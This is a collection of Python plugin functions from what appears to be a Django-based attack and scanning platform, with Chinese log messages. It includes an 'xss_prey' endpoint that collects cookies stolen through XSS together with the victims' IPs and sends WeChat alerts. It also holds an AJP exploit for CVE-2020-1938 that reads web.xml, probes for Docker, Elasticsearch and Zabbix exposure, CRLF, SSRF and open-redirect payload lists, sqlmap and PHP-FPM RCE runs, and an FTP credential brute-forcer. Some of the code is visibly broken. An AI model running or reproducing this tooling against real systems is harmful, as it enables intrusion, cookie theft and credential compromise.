def xss_prey(request): if 'HTTP_X_FORWARDED_FOR' in request.META: ip = request.META['HTTP_X_FORWARDED_FOR'] else: try: ip = request.META['REMOTE_ADDR'] except: ip = '0.0.0.0' ip = ip.replace("'", "\'") domain = request.GET.get('domain', 'Unknown').replace("'", "\'") user_agent = request.META.get('HTTP_USER_AGENT', 'Unknown').replace("'", "\'") # method = requests.method.replace("'","\'") full_path = request.get_full_path() full_path = unquote(full_path) logger.debug(full_path) cookie = full_path logger.info(cookie) try: XssPrey.objects.update_or_create(domain=domain, user_agent=user_agent, cookie=cookie, ip=ip) title = '发现XSS猎物' content = domain wechat.send_msg(title, content) except Exception as e: logger.critical(e) return HttpResponse('{"status":"ok"}', content_type='application/json')
def start(**kwargs): policy = kwargs['policy'] socket.setdefaulttimeout(2) ports = Port.objects.filter(service_name__icontains='docker') if not ports: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) for port in ports: port_num = port.port_num ip = port.asset.ip logger.debug("[%s] [%s] %s" % (plugin, port.id, ip)) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port_num)) payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % ( ip, port_num) s.send(payload.encode()) recv = s.recv(1024) if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv: logger.info( '%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable")) desc = 'Docker未授权访问漏洞,获取到如下信息:\n' + str(recv) Risk.objects.update_or_create(target=ip, risk_type='docker未授权访问', defaults={'desc': desc}) title = 'docker未授权访问' content = desc wechat.send_msg(title, content) except Exception as e: logger.error(e)
def start(**kwargs): policy = kwargs['policy'] assets = kwargs['assets'] socket.setdefaulttimeout(2) ports = Port.objects.filter(asset_id__in=assets, port_num=8009) for port in ports: port_num = port.port_num ip = port.asset.ip logger.debug("[%s] [%s] %s" % (plugin, port.id, ip)) try: t = Tomcat(ip, port_num) _, data = t.perform_request('/hissec{".jsp" if args.rce else ""}', attributes=[ {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']}, {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']}, {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']}, ]) logger.info('----------------------------') res = ''.join([d.data.decode('utf_8') for d in data]) if "web-app" in res: logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable")) desc = 'cve-2020-1938 漏洞,获取到如下信息:\n' + str(res) Risk.objects.update_or_create(port=port, asset=port.asset, risk_type='cve-2020-1938', defaults={'desc': desc}) title = '发现cve-2020-1938漏洞' content = desc wechat.send_msg(title, content) except Exception as e: logger.error(e) logger.info('-' * 75)
def start(**kwargs): policy = kwargs['policy'] if policy == 'full': ports = Port.objects.filter(port_num='9200') else: ports = Port.objects.exclude(scanned__icontains=plugin).filter( port_num=9200) if not ports: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) protocols = ['http', 'https'] for port in ports: ip = port.asset.ip for protocol in protocols: try: url = protocol + "://" + ip + ":" + str( port.port_num) + "/_cat" logger.debug("[%s] [%s] %s" % (plugin, port.id, url)) response = requests.get(url) if "/_cat/master" in response.text: logger.info('[$$$]success, 可以匿名访问') Risk.objects.update_or_create( target=url, risk_type='elasticsearch匿名访问', defaults={'desc': 'elasticsearch匿名访问, ' + url}) logger.info("[True], this host is vulnerable") title = 'elasticsearch匿名访问' content = url wechat.send_msg(title, content) except Exception as e: logger.error(e) update_scan_status(port, plugin)
def check(obj): try: url = obj.url except: url = obj.subdomain + '/' if url_is_ip(url): return for payload in payloads: _url = url + payload logger.debug("[%s] [%s] %s" % (plugin, obj.id, _url)) headers = settings.HTTP_HEADERS try: res = requests.get(_url, headers=headers, timeout=10, verify=False, allow_redirects=False) except Exception as e: # logger.error(e) res = None if res: try: if 'dandh811' in res.headers.keys(): logger.info('[$$$] %s , 该域名存在漏洞' % _url) Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload}) title = '发现HTTP头注入漏洞' content = _url wechat.send_msg(title, content) except Exception as e: logger.critical(e) try: headers["x-request-id"] = 'test' + payload res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False) except Exception as e: continue try: if 'dandh811' in res.headers.keys(): Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload}) logger.info('success, 该域名存在漏洞') title = '发现HTTP头注入漏洞' content = _url wechat.send_msg(title, content) except Exception as e: logger.critical(e) update_scan_status(obj, plugin)
def start(**kwargs): webapps = kwargs['webapps'] policy = kwargs['policy'] if policy == 'increase': webapps = webapps.exclude(scanned__icontains=plugin).order_by('-id') if not webapps: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) denominator = len(webapps) molecular = 0 for webapp in webapps: subdomain = webapp.subdomain molecular += 1 if not bool(re.search('[a-z]', subdomain.split(':')[1])): continue logger.info('-' * 75) logger.debug("[%s] [%s] %s" % (plugin, webapp.id, subdomain)) # if not web_is_online(subdomain.replace('https://', '')): # webapp.delete() # 判断web是否开启443,关闭则删除 # logger.info('[删除] ' + subdomain) # continue try: a = HTTP_REQUEST_SMUGGLER(subdomain) res = a.run() if res: logger.info(res) Risk.objects.update_or_create(target=subdomain, risk_type='HTTP夹带攻击', defaults={'desc': res}) title = '发现漏洞' content = "漏洞类型:" + plugin wechat.send_msg(title, content) except Exception as e: logger.critical(e) if molecular == denominator: percent = 100.0 logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator)) else: percent = round(1.0 * molecular / denominator * 100, 2) logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator)) update_scan_status(webapp, 'smuggling')
def start(**kwargs): policy = kwargs['policy'] if policy == 'full': weburls = WebUrls.objects.filter(url__contains='?').order_by('-id') else: weburls = WebUrls.objects.filter(url__contains='?').exclude( scanned__icontains=plugin).order_by('-id') if not weburls: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) return keywords = [ 'share', 'wap', 'url', 'link', 'src', 'source', 'target', 'u', '3g', 'display', 'sourceURl', 'imageURL', 'domain' ] for weburl in weburls: for keyword in keywords: _keyword = '?' + keyword + '=' if _keyword in weburl.url: url = weburl.url.split( _keyword)[0] + _keyword + 'http://127.0.0.1:22' logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url)) try: res = requests.get( url, timeout=10, verify=False, allow_redirects=False).content.decode('utf-8') if 'mismatch' in res: logger.info(res) logger.info('[$$$] success, 发现%s漏洞' % url) Risk.objects.update_or_create(target=url, risk_type=plugin, defaults={'desc': url}) title = '发现%s漏洞' % plugin content = '-' wechat.send_msg(title, content) update_scan_status(weburl, plugin) except Exception as e: logger.critical(e)
def start(**kwargs): policy = kwargs['policy'] if policy == 'full': weburls = WebUrls.objects.filter(url__contains='?').order_by('-id') else: weburls = WebUrls.objects.filter(url__contains='?').exclude(scanned__icontains='sqli').order_by('-id') if not weburls: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) return denominator = len(weburls) molecular = 0 for weburl in weburls: molecular += 1 url = weburl.url logger.info('-' * 75) logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url)) data = sqlmap(url) try: if data: logger.info(data) logger.info('[$$$]success, 发现SQL注入漏洞') Risk.objects.update_or_create(target=url, risk_type='SQL注入', defaults={'desc': data}) title = '发现SQL注入漏洞' content = '-' wechat.send_msg(title, content) else: logger.info('未发现漏洞') update_scan_status(weburl, 'sqli') except Exception as e: logger.info('* %s' % e) if molecular == denominator: percent = 100.0 logger.info('进度: %s [%d/%d]' % (str(percent)+'%', molecular, denominator)) else: percent = round(1.0 * molecular / denominator * 100, 2) logger.info('进度 : %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
def start(**kwargs): policy = kwargs['policy'] webapps = kwargs['webapps'] if policy == 'increase': webapps = webapps.filter(other_info__icontains='php/').exclude( scanned__icontains=plugin) else: webapps = webapps.filter(other_info__icontains='php/') if not webapps: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) for webapp in webapps: url = webapp.subdomain logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url)) cmd = '/root/go/bin/phuip-fpizdam %s/index.php' % url logger.info(cmd) p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() out = out.decode('utf-8') logger.info(out) logger.error(err.decode('utf-8')) if 'success' in out: Risk.objects.update_or_create(target=url, risk_type='php漏洞', defaults={'desc': cmd}) logger.info('[$$$]success') title = '发现漏洞' content = plugin wechat.send_msg(title, content) update_scan_status(webapp, plugin) logger.info('-' * 75)
def start(**kwargs): webapps = kwargs['webapps'] policy = kwargs['policy'] keywords = [ 'next', 'url', 'return', 'redirect_url', 'callback_url', 'callback', 'r', 'target', 'error', 'errurl', 'error_url', 'redirect', 'redirect_to', 'jump', 'jump_to', 'to', 'link', 'linkto', 'domain', 'u', 'continue', 'back_url' ] payloads = [ r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com', '////baidu.com', 'https://[email protected]', '#baidu.com', '?baidu.com', r'\\baidu.com', '.baidu', '.baidu.com', '///baidu.com//..', '////baidu.com//..', '/http://baidu.com' ] chrome_options = Options() chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--headless') chrome_options.add_argument('--disable-dev-shm-usage') if policy == 'full': weburls = WebUrls.objects.order_by('-id') else: weburls = WebUrls.objects.exclude(scanned__icontains=plugin) webapps = webapps.exclude(scanned__icontains=plugin) if not weburls: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) for weburl in weburls: url = parse.unquote(weburl.url, 'utf-8') if url_is_ip(url): continue logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url)) try: browser = webdriver.Chrome( executable_path='/opt/tools/chromedriver', chrome_options=chrome_options) except Exception as e: logger.critical(e) continue risk = False parseResult = parse.urlparse(url) param_dict = parse.parse_qs(parseResult.query) for param in param_dict.keys(): if param not in keywords: continue if risk: continue for payload in payloads: _url = url.replace(param + '=' + param_dict[param][0], param + '=' + payload) logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url)) try: browser.get(url) cur_url = browser.current_url browser.close() except Exception as e: continue if 'www.baidu' in cur_url: logger.info('[$$$] success, 发现漏洞') Risk.objects.update_or_create(target=url, risk_type='开放重定向', defaults={"desc": _url}) title = '发现开放重定向漏洞' content = '-' wechat.send_msg(title, content) risk = True try: subprocess.call('pkill chrome', shell=True) except Exception as e: logger.critical(e) finally: browser.quit() update_scan_status(weburl, plugin) if not webapps: logger.debug("[%s] %s" % (plugin, 'There are no objects to scan')) payloads2 = [ r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com', '////baidu.com', '#baidu.com', '?baidu.com', r'\\baidu.com', '///baidu.com//..', '////baidu.com//..', '/http://baidu.com' ] for webapp in webapps: try: browser = webdriver.Chrome( executable_path='/opt/tools/chromedriver', chrome_options=chrome_options) except Exception as e: logger.critical(e) continue risk = False for payload in payloads2: if risk: continue url = webapp.subdomain + payload logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url)) try: browser.get(url) cur_url = browser.current_url browser.close() except Exception as e: cur_url = 'error' if 'www.baidu' in cur_url: logger.info('[$$$] success, 发现漏洞') Risk.objects.update_or_create(target=url, risk_type='开放重定向', defaults={"desc": url}) title = '发现开放重定向漏洞' content = url wechat.send_msg(title, content) risk = True try: update_scan_status(webapp, plugin) subprocess.call('pkill chrome', shell=True) except Exception as e: logger.critical(e) finally: browser.quit()
def start(**kwargs): policy = kwargs['policy'] if policy == 'full': ports = Port.objects.filter(service_name__icontains=plugin) else: ports = Port.objects.filter(service_name__icontains=plugin).exclude( scanned__icontains=plugin) if not ports: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) has_risk = False for port in ports: ip = port.asset.ip try: logger.debug("[%s] [%s] %s" % (plugin, port.id, ip)) socket.setdefaulttimeout(10) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port.port_num)) s.send("success".encode('utf-8')) result = s.recv(1024).decode('utf-8') if "Environment" in result: logger.info('+ Found Vul: \033[0;32m %s, %s\033[0m' % (ip, str(port.port_num))) # command = "redis-cli -h %s -p %s" % (ip, port.port_num) # res = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, # stderr=subprocess.PIPE) # res.stdin.write(b'info \n') # out, err = res.communicate() # out = out.decode('utf-8') # logger.info(out) # desc = 'redis空口令,连接上redis后,执行了info命令,读取到如下信息:\n' + str(out) desc = 'zabbix未授权访问' Risk.objects.update_or_create(target=port.asset.ip, risk_type='zabbix漏洞', defaults={'desc': desc}) has_risk = True # elif "Authentication" in result: # for pass_ in passwords: # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect((ip, 6379)) # s.send(("AUTH %s\r\n" % pass_).encode('utf-8')) # result = s.recv(1024).decode('utf-8') # if '+OK' in result: # Risk.objects.update_or_create(port=port, defaults={'asset': port.asset, # 'risk_type': 'redis弱密码', # 'desc': '弱密码 %s' % pass_ # # }) # logger.info(ip + ':' + str(port.port_num) + ' 存在弱口令漏洞,密码:%s' % pass_) # has_risk = True except Exception as e: logger.error(e) if has_risk: title = '风险提示' content = "发现zookeeper漏洞" wechat.send_msg(title, content) logger.info('-' * 100)
def get_reports(result, webapp): # 获取scan_id的扫描报告 """ 11111111-1111-1111-1111-111111111111 Developer 21111111-1111-1111-1111-111111111111 XML 11111111-1111-1111-1111-111111111119 OWASP Top 10 2013 11111111-1111-1111-1111-111111111112 Quick """ url = result['target']['address'] count = 0 while True: time.sleep(10) res = get_status(result) if res == 'completed': scan_id = result['scan_id'] target_id = result['target_id'] data = {"template_id": "11111111-1111-1111-1111-111111111111", "source": {"list_type": "scans", "id_list": [scan_id]}} try: response = requests.post(host + "api/v1/reports", data=json.dumps(data), headers=api_header, timeout=30, verify=False) scan_result = response.headers loc = scan_result['Location'] except Exception as e: logger.info('* %s' % e) sys.exit() logger.info('+ %s 扫描完成,正在生成报告 ...' % (time.strftime("%H:%M:%S"))) while True: time.sleep(3) try: response = requests.get(host.strip('/') + loc, headers=api_header, timeout=30, verify=False) res = json.loads(response.content.decode('utf-8')) if res['download']: break except Exception as e: logger.info(e) logger.info('+ %s 报告生成完毕,下载中 ...' % (time.strftime("%H:%M:%S", time.localtime(time.time())))) try: report_download_url = res['download'][0] report_response = requests.get(host.strip('/') + report_download_url, headers=api_header, timeout=30, verify=False) report_path_ = '/files/reports/' + scan_id + '.html' logger.info('+ 报告存储路径: %s' % report_path_) report_path = settings.BASE_DIR + report_path_ with open(report_path, 'wb') as f: f.write(report_response.content) except Exception as e: logger.info('* %s' % e) sys.exit() webapp.report = report_path_ try: response = requests.get(host + 'api/v1/vulnerabilities?q=severity:3', headers=api_header, timeout=30, verify=False) res = json.loads(response.content.decode('utf-8')) vul_names = [] ignore_vuls = ['nginx Integer Overflow'] for vul in res['vulnerabilities']: if vul['target_id'] == target_id and vul['vt_name'] not in ignore_vuls: vul_names.append(vul['vt_name']) if vul_names: for vul_name in vul_names: logger.info('--- %s' % vul_name) desc = '\n'.join(vul_names) risk = Risk.objects.update_or_create(target=webapp.subdomain, risk_type='awvs扫描漏洞', defaults={'desc': desc}) webapp.risk = risk[0] title = 'awvs扫描漏洞' content = desc wechat.send_msg(title, content) else: logger.info('+ 未发现高风险漏洞') except Exception as e: logger.info('* %s' % e) webapp.save() logger.info('+ %s 报告已保存' % (time.strftime("%H:%M:%S", time.localtime(time.time())))) break if res == 'aborted': break
def start(**kwargs): policy = kwargs['policy'] if policy == 'full': ports = Port.objects.filter(service_name__icontains=plugin) else: ports = Port.objects.exclude(scanned__icontains=plugin).filter( service_name__icontains=plugin) if not ports: logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象')) with open(settings.BASE_DIR + 'brute/usernames.txt', 'r') as f: usernames = f.readlines() with open(settings.BASE_DIR + 'brute/passwords.txt', 'r') as f: passwords = f.readlines() ftp = ftplib.FTP() for port in ports: ip = port.asset.ip logger.debug("[%s] [%s] %s" % (plugin, port.id, ip)) try: ftp.connect(ip, port.port_num, timeout=5) logger.info('ftp端口可以连接') except Exception as e: logger.error(e) port.delete() logger.info('FTP端口连接失败,删除端口') continue try: ftp.login('', '') logger.info('[$$$] FTP登录成功!') Risk.objects.update_or_create(target=ip, risk_type='ftp匿名登录', defaults={ 'target': ip, 'desc': 'ftp匿名登录' }) continue except Exception as e: logger.error(e) for username in usernames: username = username.strip() for password in passwords: password = password.strip() try: # logger.debug(username + ':' + password) ftp.login(username, password) logger.info('[$$$] FTP登录成功!') logger.info('[$$$]success, %s:%s' % (username, password)) Risk.objects.update_or_create( target=ip, risk_type='ftp弱口令', defaults={'desc': '%s:%s' % (username, password)}) title = 'ftp弱口令' content = '-' wechat.send_msg(title, content) except Exception as e: # logger.info(e) pass update_scan_status(port, plugin) logger.info('-' * 75)